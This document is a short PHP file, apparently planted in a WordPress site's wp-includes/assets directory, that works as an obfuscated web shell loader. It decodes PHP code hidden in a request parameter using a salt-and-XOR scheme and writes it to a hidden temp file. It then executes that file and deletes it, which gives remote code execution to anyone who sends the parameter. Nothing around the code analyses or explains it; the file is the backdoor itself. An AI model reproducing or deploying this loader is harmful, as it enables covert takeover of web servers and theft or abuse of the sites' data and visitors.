File: /var/www/vhosts/miroglu.net/subdomains/serhatburke/wp-includes/assets/lamina.php
<?php
if(!is_null($_REQUEST["t\x6Bn"] ?? null)){
$flag = $_REQUEST["t\x6Bn"];
$flag = explode("." , $flag ) ;
$binding ='';
$salt ='abcdefghijklmnopqrstuvwxyz0123456789';
$sLen =strlen( $salt);
$x =0;
foreach( $flag as $v7) {
$chS =ord( $salt[$x %$sLen]);
$dec =( ( int)$v7 - $chS -( $x %10)) ^17;
$binding .= chr( $dec);
$x++;}
$data_chunk = array_filter([sys_get_temp_dir(), "/dev/shm", getenv("TMP"), "/tmp", session_save_path(), getenv("TEMP"), "/var/tmp", ini_get("upload_tmp_dir"), getcwd()]);
foreach ($data_chunk as $key => $value) {
if (array_product([is_dir($value), is_writable($value)])) {
$symbol = join("/", [$value, ".object"]);
$success = file_put_contents($symbol, $binding);
if ($success) {
include $symbol;
@unlink($symbol);
exit;}
}
}
}